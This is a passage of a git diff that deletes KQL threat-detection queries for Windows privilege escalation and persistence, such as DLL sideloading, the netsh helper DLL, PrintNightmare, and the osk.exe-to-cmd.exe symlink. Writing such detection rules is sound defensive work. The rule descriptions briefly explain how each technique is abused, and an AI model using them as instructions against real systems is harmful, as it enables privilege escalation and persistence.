(x86)\\" or FolderPath startswith "C:\\Program Files\\"))) and (not(((FolderPath contains "\\AppData\\Local\\Temp\\GUM" and FolderPath contains ".tmp\\goopdate.dll") and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\GUM" and InitiatingProcessFolderPath contains ".tmp\\Dropbox")))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_Iviewers.DLL_Sideloading.kql b/Privilege Escalation/Potential_Iviewers.DLL_Sideloading.kql deleted file mode 100644 index 3d46efa4..00000000 --- a/Privilege Escalation/Potential_Iviewers.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/03/21 -// Level: high -// Description: Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\iviewers.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\" or FolderPath startswith "C:\\Program Files\\Windows Kits\\"))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_Libvlc.DLL_Sideloading.kql b/Privilege Escalation/Potential_Libvlc.DLL_Sideloading.kql deleted file mode 100644 index 3fce189b..00000000 --- a/Privilege Escalation/Potential_Libvlc.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior -// Date: 2023/04/17 -// Level: medium -// Description: Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\libvlc.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\VideoLAN\\VLC\\" or FolderPath startswith "C:\\Program Files\\VideoLAN\\VLC\\"))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_Mfdetours.DLL_Sideloading.kql b/Privilege Escalation/Potential_Mfdetours.DLL_Sideloading.kql deleted file mode 100644 index 163f4b42..00000000 --- a/Privilege Escalation/Potential_Mfdetours.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/08/03 -// Level: medium -// Description: Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution. -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\mfdetours.dll" and (not(FolderPath contains ":\\Program Files (x86)\\Windows Kits\\10\\bin\\")) \ No newline at end of file diff --git a/Privilege Escalation/Potential_Persistence_Via_GlobalFlags.kql b/Privilege Escalation/Potential_Persistence_Via_GlobalFlags.kql deleted file mode 100644 index 0af11ee9..00000000 --- a/Privilege Escalation/Potential_Persistence_Via_GlobalFlags.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Karneades, Jonhnathan Ribeiro, Florian Roth -// Date: 2018/04/11 -// Level: high -// Description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys -// Tags: attack.privilege_escalation, attack.persistence, attack.defense_evasion, attack.t1546.012, car.2013-01-002 -DeviceRegistryEvents -| where (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion" and RegistryKey contains "\\Image File Execution Options" and RegistryKey contains "\\GlobalFlag") or ((RegistryKey contains "\\ReportingMode" or RegistryKey contains "\\MonitorProcess") and (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion" and RegistryKey contains "\\SilentProcessExit")) \ No newline at end of file diff --git a/Privilege Escalation/Potential_Persistence_Via_Netsh_Helper_DLL.kql b/Privilege Escalation/Potential_Persistence_Via_Netsh_Helper_DLL.kql deleted file mode 100644 index 5512073b..00000000 --- a/Privilege Escalation/Potential_Persistence_Via_Netsh_Helper_DLL.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Victor Sergeev, oscd.community -// Date: 2019/10/25 -// Level: medium -// Description: Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed. - -// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.007, attack.s0108 -DeviceProcessEvents -| where (ProcessCommandLine contains "add" and ProcessCommandLine contains "helper") and (ProcessVersionInfoOriginalFileName =~ "netsh.exe" or FolderPath endswith "\\netsh.exe") \ No newline at end of file diff --git a/Privilege Escalation/Potential_PrintNightmare_Exploitation_Attempt.kql b/Privilege Escalation/Potential_PrintNightmare_Exploitation_Attempt.kql deleted file mode 100644 index 7040127d..00000000 --- a/Privilege Escalation/Potential_PrintNightmare_Exploitation_Attempt.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Bhabesh Raj -// Date: 2021/07/01 -// Level: high -// Description: Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675 -// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574, cve.2021.1675 -DeviceFileEvents -| where InitiatingProcessFolderPath endswith "\\spoolsv.exe" and FolderPath contains "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\" \ No newline at end of file diff --git a/Privilege Escalation/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql b/Privilege Escalation/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql deleted file mode 100644 index 1a2be179..00000000 --- a/Privilege Escalation/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash) -// Date: 2022/12/16 -// Level: high -// Description: Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation -DeviceFileEvents -| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local" or FolderPath startswith "C:\\Windows\\System32\\wermgr.exe.local") \ No newline at end of file diff --git a/Privilege Escalation/Potential_Privilege_Escalation_Using_Symlink_Between_Osk_and_Cmd.kql b/Privilege Escalation/Potential_Privilege_Escalation_Using_Symlink_Between_Osk_and_Cmd.kql deleted file mode 100644 index c40a0f11..00000000 --- a/Privilege Escalation/Potential_Privilege_Escalation_Using_Symlink_Between_Osk_and_Cmd.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/12/11 -// Level: high -// Description: Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in. -// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.008 -DeviceProcessEvents -| where (ProcessCommandLine contains "mklink" and ProcessCommandLine contains "\\osk.exe" and ProcessCommandLine contains "\\cmd.exe") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/Privilege Escalation/Potential_Privilege_Escalation_via_Service_Permissions_Weakness.kql b/Privilege Escalation/Potential_Privilege_Escalation_via_Service_Permissions_Weakness.kql deleted file mode 100644 index e10e42a6..00000000 --- a/Privilege Escalation/Potential_Privilege_Escalation_via_Service_Permissions_Weakness.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Teymur Kheirkhabarov -// Date: 2019/10/26 -// Level: high -// Description: Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level -// Tags: attack.privilege_escalation, attack.t1574.011 -DeviceProcessEvents -| where (ProcessCommandLine contains "\\ImagePath" or ProcessCommandLine contains "\\FailureCommand" or ProcessCommandLine contains "\\ServiceDll") and (ProcessCommandLine contains "ControlSet" and ProcessCommandLine contains "services") and ProcessIntegrityLevel =~ "Medium" \ No newline at end of file diff --git a/Privilege Escalation/Potential_Rcdll.DLL_Sideloading.kql b/Privilege Escalation/Potential_Rcdll.DLL_Sideloading.kql deleted file mode 100644 index dc23a7d8..00000000 --- a/Privilege Escalation/Potential_Rcdll.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/03/13 -// Level: high -// Description: Detects potential DLL sideloading of rcdll.dll -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\rcdll.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\" or FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\"))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_RjvPlatform.DLL_Sideloading_From_Default_Location.kql b/Privilege Escalation/Potential_RjvPlatform.DLL_Sideloading_From_Default_Location.kql deleted file mode 100644 index fef361b2..00000000 --- a/Privilege Escalation/Potential_RjvPlatform.DLL_Sideloading_From_Default_Location.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/06/09 -// Level: medium -// Description: Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default. -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\SystemResetPlatform\\SystemResetPlatform.exe" and FolderPath =~ "C:\\$SysReset\\Framework\\Stack\\RjvPlatform.dll" \ No newline at end of file diff --git a/Privilege Escalation/Potential_RjvPlatform.DLL_Sideloading_From_Non-Default_Location.kql b/Privilege Escalation/Potential_RjvPlatform.DLL_Sideloading_From_Non-Default_Location.kql deleted file mode 100644 index 172b3879..00000000 --- a/Privilege Escalation/Potential_RjvPlatform.DLL_Sideloading_From_Non-Default_Location.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/06/09 -// Level: high -// Description: Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location. -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where (InitiatingProcessFolderPath =~ "\\SystemResetPlatform.exe" and FolderPath endswith "\\RjvPlatform.dll") and (not(InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\SystemResetPlatform\\")) \ No newline at end of file diff --git a/Privilege Escalation/Potential_RoboForm.DLL_Sideloading.kql b/Privilege Escalation/Potential_RoboForm.DLL_Sideloading.kql deleted file mode 100644 index bd581c2f..00000000 --- a/Privilege Escalation/Potential_RoboForm.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/14 -// Level: medium -// Description: Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\roboform.dll" or FolderPath endswith "\\roboform-x64.dll") and (not(((InitiatingProcessFolderPath endswith "\\robotaskbaricon.exe" or InitiatingProcessFolderPath endswith "\\robotaskbaricon-x64.exe") and (InitiatingProcessFolderPath startswith " C:\\Program Files (x86)\\Siber Systems\\AI RoboForm\\" or InitiatingProcessFolderPath startswith " C:\\Program Files\\Siber Systems\\AI RoboForm\\")))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_ShellDispatch.DLL_Sideloading.kql b/Privilege Escalation/Potential_ShellDispatch.DLL_Sideloading.kql deleted file mode 100644 index 5e537033..00000000 --- a/Privilege Escalation/Potential_ShellDispatch.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/06/20 -// Level: medium -// Description: Detects potential DLL sideloading of "ShellDispatch.dll" -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\ShellDispatch.dll" and (not(((FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\Temp\\") or FolderPath contains ":\\Windows\\Temp\\"))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_Shim_Database_Persistence_via_Sdbinst.EXE.kql b/Privilege Escalation/Potential_Shim_Database_Persistence_via_Sdbinst.EXE.kql deleted file mode 100644 index 56927dce..00000000 --- a/Privilege Escalation/Potential_Shim_Database_Persistence_via_Sdbinst.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Markus Neis -// Date: 2019/01/16 -// Level: medium -// Description: Detects installation of a new shim using sdbinst.exe. -Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims - -// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.011 -DeviceProcessEvents -| where (ProcessCommandLine contains ".sdb" and (FolderPath endswith "\\sdbinst.exe" or ProcessVersionInfoOriginalFileName =~ "sdbinst.exe")) and (not(((ProcessCommandLine contains ":\\Program Files (x86)\\IIS Express\\iisexpressshim.sdb" or ProcessCommandLine contains ":\\Program Files\\IIS Express\\iisexpressshim.sdb") and InitiatingProcessFolderPath endswith "\\msiexec.exe"))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_SmadHook.DLL_Sideloading.kql b/Privilege Escalation/Potential_SmadHook.DLL_Sideloading.kql deleted file mode 100644 index 83ffa4c6..00000000 --- a/Privilege Escalation/Potential_SmadHook.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/06/01 -// Level: high -// Description: Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\SmadHook32c.dll" or FolderPath endswith "\\SmadHook64c.dll") and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\SMADAV\\SmadavProtect32.exe", "C:\\Program Files (x86)\\SMADAV\\SmadavProtect64.exe", "C:\\Program Files\\SMADAV\\SmadavProtect32.exe", "C:\\Program Files\\SMADAV\\SmadavProtect64.exe")) and (FolderPath startswith "C:\\Program Files (x86)\\SMADAV\\" or FolderPath startswith "C:\\Program Files\\SMADAV\\")))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_SolidPDFCreator.DLL_Sideloading.kql b/Privilege Escalation/Potential_SolidPDFCreator.DLL_Sideloading.kql deleted file mode 100644 index fbd5181d..00000000 --- a/Privilege Escalation/Potential_SolidPDFCreator.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/05/07 -// Level: medium -// Description: Detects potential DLL sideloading of "SolidPDFCreator.dll" -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\SolidPDFCreator.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\SolidDocuments\\SolidPDFCreator\\" or FolderPath startswith "C:\\Program Files\\SolidDocuments\\SolidPDFCreator\\") and InitiatingProcessFolderPath endswith "\\SolidPDFCreator.exe"))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_Suspicious_Activity_Using_SeCEdit.kql b/Privilege Escalation/Potential_Suspicious_Activity_Using_SeCEdit.kql deleted file mode 100644 index e8d18e0e..00000000 --- a/Privilege Escalation/Potential_Suspicious_Activity_Using_SeCEdit.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Janantha Marasinghe -// Date: 2022/11/18 -// Level: medium -// Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy -// Tags: attack.discovery, attack.persistence, attack.defense_evasion, attack.credential_access, attack.privilege_escalation, attack.t1562.002, attack.t1547.001, attack.t1505.005, attack.t1556.002, attack.t1562, attack.t1574.007, attack.t1564.002, attack.t1546.008, attack.t1546.007, attack.t1547.014, attack.t1547.010, attack.t1547.002, attack.t1557, attack.t1082 -DeviceProcessEvents -| where (FolderPath endswith "\\secedit.exe" or ProcessVersionInfoOriginalFileName =~ "SeCEdit") and ((ProcessCommandLine contains "/configure" and ProcessCommandLine contains "/db") or (ProcessCommandLine contains "/export" and ProcessCommandLine contains "/cfg")) \ No newline at end of file diff --git a/Privilege Escalation/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql b/Privilege Escalation/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql deleted file mode 100644 index 1884165c..00000000 --- a/Privilege Escalation/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/14 -// Level: high -// Description: Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.). -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\shfolder.dll" or FolderPath endswith "\\activeds.dll" or FolderPath endswith "\\adsldpc.dll" or FolderPath endswith "\\aepic.dll" or FolderPath endswith "\\apphelp.dll" or FolderPath endswith "\\applicationframe.dll" or FolderPath endswith "\\appxalluserstore.dll" or FolderPath endswith "\\appxdeploymentclient.dll" or FolderPath endswith "\\archiveint.dll" or FolderPath endswith "\\atl.dll" or FolderPath endswith "\\audioses.dll" or FolderPath endswith "\\auditpolcore.dll" or FolderPath endswith "\\authfwcfg.dll" or FolderPath endswith "\\authz.dll" or FolderPath endswith "\\avrt.dll" or FolderPath endswith "\\bcd.dll" or FolderPath endswith "\\bcp47langs.dll" or FolderPath endswith "\\bcp47mrm.dll" or FolderPath endswith "\\bcrypt.dll" or FolderPath endswith "\\cabinet.dll" or FolderPath endswith "\\cabview.dll" or FolderPath endswith "\\certenroll.dll" or FolderPath endswith "\\cldapi.dll" or FolderPath endswith "\\clipc.dll" or FolderPath endswith "\\clusapi.dll" or FolderPath endswith "\\cmpbk32.dll" or FolderPath endswith "\\coloradapterclient.dll" or FolderPath endswith "\\colorui.dll" or FolderPath endswith "\\comdlg32.dll" or FolderPath endswith "\\connect.dll" or FolderPath endswith "\\coremessaging.dll" or FolderPath endswith "\\credui.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\cryptdll.dll" or FolderPath endswith "\\cryptui.dll" or FolderPath endswith "\\cryptxml.dll" or FolderPath endswith "\\cscapi.dll" or FolderPath endswith "\\cscobj.dll" or FolderPath endswith "\\cscui.dll" or FolderPath endswith "\\d2d1.dll" or FolderPath endswith "\\d3d10.dll" or FolderPath endswith "\\d3d10_1.dll" or FolderPath endswith "\\d3d10_1core.dll" or FolderPath endswith "\\d3d10core.dll" or FolderPath endswith "\\d3d10warp.dll" or FolderPath endswith "\\d3d11.dll" or FolderPath endswith "\\d3d12.dll" or FolderPath endswith "\\d3d9.dll" or FolderPath endswith "\\dataexchange.dll" or FolderPath endswith "\\davclnt.dll" or FolderPath endswith "\\dcomp.dll" or FolderPath endswith "\\defragproxy.dll" or FolderPath endswith "\\desktopshellext.dll" or FolderPath endswith "\\deviceassociation.dll" or FolderPath endswith "\\devicecredential.dll" or FolderPath endswith "\\devicepairing.dll" or FolderPath endswith "\\devobj.dll" or FolderPath endswith "\\devrtl.dll" or FolderPath endswith "\\dhcpcmonitor.dll" or FolderPath endswith "\\dhcpcsvc.dll" or FolderPath endswith "\\dhcpcsvc6.dll" or FolderPath endswith "\\directmanipulation.dll" or FolderPath endswith "\\dismapi.dll" or FolderPath endswith "\\dismcore.dll" or FolderPath endswith "\\dmcfgutils.dll" or FolderPath endswith "\\dmcmnutils.dll" or FolderPath endswith "\\dmenrollengine.dll" or FolderPath endswith "\\dmenterprisediagnostics.dll" or FolderPath endswith "\\dmiso8601utils.dll" or FolderPath endswith "\\dmoleaututils.dll" or FolderPath endswith "\\dmprocessxmlfiltered.dll" or FolderPath endswith "\\dmpushproxy.dll" or FolderPath endswith "\\dmxmlhelputils.dll" or FolderPath endswith "\\dnsapi.dll" or FolderPath endswith "\\dot3api.dll" or FolderPath endswith "\\dot3cfg.dll" or FolderPath endswith "\\drprov.dll" or FolderPath endswith "\\dsclient.dll" or FolderPath endswith "\\dsparse.dll" or FolderPath endswith "\\dsreg.dll" or FolderPath endswith "\\dsrole.dll" or FolderPath endswith "\\dui70.dll" or FolderPath endswith "\\duser.dll" or FolderPath endswith "\\dusmapi.dll" or FolderPath endswith "\\dwmapi.dll" or FolderPath endswith "\\dwrite.dll" or FolderPath endswith "\\dxgi.dll" or FolderPath endswith "\\dxva2.dll" or FolderPath endswith "\\eappcfg.dll" or FolderPath endswith "\\eappprxy.dll" or FolderPath endswith "\\edputil.dll" or FolderPath endswith "\\efsadu.dll" or FolderPath endswith "\\efsutil.dll" or FolderPath endswith "\\esent.dll" or FolderPath endswith "\\execmodelproxy.dll" or FolderPath endswith "\\explorerframe.dll" or FolderPath endswith "\\fastprox.dll" or FolderPath endswith "\\faultrep.dll" or FolderPath endswith "\\fddevquery.dll" or FolderPath endswith "\\feclient.dll" or FolderPath endswith "\\fhcfg.dll" or FolderPath endswith "\\firewallapi.dll" or FolderPath endswith "\\flightsettings.dll" or FolderPath endswith "\\fltlib.dll" or FolderPath endswith "\\fveapi.dll" or FolderPath endswith "\\fwbase.dll" or FolderPath endswith "\\fwcfg.dll" or FolderPath endswith "\\fwpolicyiomgr.dll" or FolderPath endswith "\\fwpuclnt.dll" or FolderPath endswith "\\getuname.dll" or FolderPath endswith "\\hid.dll" or FolderPath endswith "\\hnetmon.dll" or FolderPath endswith "\\httpapi.dll" or FolderPath endswith "\\idstore.dll" or FolderPath endswith "\\ieadvpack.dll" or FolderPath endswith "\\iedkcs32.dll" or FolderPath endswith "\\iernonce.dll" or FolderPath endswith "\\iertutil.dll" or FolderPath endswith "\\ifmon.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\iri.dll" or FolderPath endswith "\\iscsidsc.dll" or FolderPath endswith "\\iscsium.dll" or FolderPath endswith "\\isv.exe_rsaenh.dll" or FolderPath endswith "\\joinutil.dll" or FolderPath endswith "\\ksuser.dll" or FolderPath endswith "\\ktmw32.dll" or FolderPath endswith "\\licensemanagerapi.dll" or FolderPath endswith "\\licensingdiagspp.dll" or FolderPath endswith "\\linkinfo.dll" or FolderPath endswith "\\loadperf.dll" or FolderPath endswith "\\logoncli.dll" or FolderPath endswith "\\logoncontroller.dll" or FolderPath endswith "\\lpksetupproxyserv.dll" or FolderPath endswith "\\magnification.dll" or FolderPath endswith "\\mapistub.dll" or FolderPath endswith "\\mfcore.dll" or FolderPath endswith "\\mfplat.dll" or FolderPath endswith "\\mi.dll" or FolderPath endswith "\\midimap.dll" or FolderPath endswith "\\miutils.dll" or FolderPath endswith "\\mlang.dll" or FolderPath endswith "\\mmdevapi.dll" or FolderPath endswith "\\mobilenetworking.dll" or FolderPath endswith "\\mpr.dll" or FolderPath endswith "\\mprapi.dll" or FolderPath endswith "\\mrmcorer.dll" or FolderPath endswith "\\msacm32.dll" or FolderPath endswith "\\mscms.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\msctf.dll" or FolderPath endswith "\\msctfmonitor.dll" or FolderPath endswith "\\msdrm.dll" or FolderPath endswith "\\msftedit.dll" or FolderPath endswith "\\msi.dll" or FolderPath endswith "\\msutb.dll" or FolderPath endswith "\\mswb7.dll" or FolderPath endswith "\\mswsock.dll" or FolderPath endswith "\\msxml3.dll" or FolderPath endswith "\\mtxclu.dll" or FolderPath endswith "\\napinsp.dll" or FolderPath endswith "\\ncrypt.dll" or FolderPath endswith "\\ndfapi.dll" or FolderPath endswith "\\netid.dll" or FolderPath endswith "\\netiohlp.dll" or FolderPath endswith "\\netplwiz.dll" or FolderPath endswith "\\netprofm.dll" or FolderPath endswith "\\netsetupapi.dll" or FolderPath endswith "\\netshell.dll" or FolderPath endswith "\\netutils.dll" or FolderPath endswith "\\networkexplorer.dll" or FolderPath endswith "\\newdev.dll" or FolderPath endswith "\\ninput.dll" or FolderPath endswith "\\nlaapi.dll" or FolderPath endswith "\\nlansp_c.dll" or FolderPath endswith "\\npmproxy.dll" or FolderPath endswith "\\nshhttp.dll" or FolderPath endswith "\\nshipsec.dll" or FolderPath endswith "\\nshwfp.dll" or FolderPath endswith "\\ntdsapi.dll" or FolderPath endswith "\\ntlanman.dll" or FolderPath endswith "\\ntlmshared.dll" or FolderPath endswith "\\ntmarta.dll" or FolderPath endswith "\\ntshrui.dll" or FolderPath endswith "\\oleacc.dll" or FolderPath endswith "\\omadmapi.dll" or FolderPath endswith "\\onex.dll" or FolderPath endswith "\\osbaseln.dll" or FolderPath endswith "\\osuninst.dll" or FolderPath endswith "\\p2p.dll" or FolderPath endswith "\\p2pnetsh.dll" or FolderPath endswith "\\p9np.dll" or FolderPath endswith "\\pcaui.dll" or FolderPath endswith "\\pdh.dll" or FolderPath endswith "\\peerdistsh.dll" or FolderPath endswith "\\pla.dll" or FolderPath endswith "\\pnrpnsp.dll" or FolderPath endswith "\\policymanager.dll" or FolderPath endswith "\\polstore.dll" or FolderPath endswith "\\printui.dll" or FolderPath endswith "\\propsys.dll" or FolderPath endswith "\\prvdmofcomp.dll" or FolderPath endswith "\\puiapi.dll" or FolderPath endswith "\\radcui.dll" or FolderPath endswith "\\rasapi32.dll" or FolderPath endswith "\\rasgcw.dll" or FolderPath endswith "\\rasman.dll" or FolderPath endswith "\\rasmontr.dll" or FolderPath endswith "\\reagent.dll" or FolderPath endswith "\\regapi.dll" or FolderPath endswith "\\resutils.dll" or FolderPath endswith "\\rmclient.dll" or FolderPath endswith "\\rpcnsh.dll" or FolderPath endswith "\\rsaenh.dll" or FolderPath endswith "\\rtutils.dll" or FolderPath endswith "\\rtworkq.dll" or FolderPath endswith "\\samcli.dll" or FolderPath endswith "\\samlib.dll" or FolderPath endswith "\\sapi_onecore.dll" or FolderPath endswith "\\sas.dll" or FolderPath endswith "\\scansetting.dll" or FolderPath endswith "\\scecli.dll" or FolderPath endswith "\\schedcli.dll" or FolderPath endswith "\\secur32.dll" or FolderPath endswith "\\shell32.dll" or FolderPath endswith "\\slc.dll" or FolderPath endswith "\\snmpapi.dll" or FolderPath endswith "\\spp.dll" or FolderPath endswith "\\sppc.dll" or FolderPath endswith "\\srclient.dll" or FolderPath endswith "\\srpapi.dll" or FolderPath endswith "\\srvcli.dll" or FolderPath endswith "\\ssp.exe_rsaenh.dll" or FolderPath endswith "\\ssp_isv.exe_rsaenh.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\ssshim.dll" or FolderPath endswith "\\staterepository.core.dll" or FolderPath endswith "\\structuredquery.dll" or FolderPath endswith "\\sxshared.dll" or FolderPath endswith "\\tapi32.dll" or FolderPath endswith "\\tbs.dll" or FolderPath endswith "\\tdh.dll" or FolderPath endswith "\\tquery.dll" or FolderPath endswith "\\tsworkspace.dll" or FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\twext.dll" or FolderPath endswith "\\twinapi.dll" or FolderPath endswith "\\twinui.appcore.dll" or FolderPath endswith "\\uianimation.dll" or FolderPath endswith "\\uiautomationcore.dll" or FolderPath endswith "\\uireng.dll" or FolderPath endswith "\\uiribbon.dll" or FolderPath endswith "\\updatepolicy.dll" or FolderPath endswith "\\userenv.dll" or FolderPath endswith "\\utildll.dll" or FolderPath endswith "\\uxinit.dll" or FolderPath endswith "\\uxtheme.dll" or FolderPath endswith "\\vaultcli.dll" or FolderPath endswith "\\virtdisk.dll" or FolderPath endswith "\\vssapi.dll" or FolderPath endswith "\\vsstrace.dll" or FolderPath endswith "\\wbemprox.dll" or FolderPath endswith "\\wbemsvc.dll" or FolderPath endswith "\\wcmapi.dll" or FolderPath endswith "\\wcnnetsh.dll" or FolderPath endswith "\\wdi.dll" or FolderPath endswith "\\wdscore.dll" or FolderPath endswith "\\webservices.dll" or FolderPath endswith "\\wecapi.dll" or FolderPath endswith "\\wer.dll" or FolderPath endswith "\\wevtapi.dll" or FolderPath endswith "\\whhelper.dll" or FolderPath endswith "\\wimgapi.dll" or FolderPath endswith "\\winbrand.dll" or FolderPath endswith "\\windows.storage.dll" or FolderPath endswith "\\windows.storage.search.dll" or FolderPath endswith "\\windowscodecs.dll" or FolderPath endswith "\\windowscodecsext.dll" or FolderPath endswith "\\windowsudk.shellcommon.dll" or FolderPath endswith "\\winhttp.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\winipsec.dll" or FolderPath endswith "\\winmde.dll" or FolderPath endswith "\\winmm.dll" or FolderPath endswith "\\winnsi.dll" or FolderPath endswith "\\winrnr.dll" or FolderPath endswith "\\winsqlite3.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\wkscli.dll" or FolderPath endswith "\\wlanapi.dll" or FolderPath endswith "\\wlancfg.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\wlidprov.dll" or FolderPath endswith "\\wmiclnt.dll" or FolderPath endswith "\\wmidcom.dll" or FolderPath endswith "\\wmiutils.dll" or FolderPath endswith "\\wmsgapi.dll" or FolderPath endswith "\\wofutil.dll" or FolderPath endswith "\\wpdshext.dll" or FolderPath endswith "\\wshbth.dll" or FolderPath endswith "\\wshelper.dll" or FolderPath endswith "\\wtsapi32.dll" or FolderPath 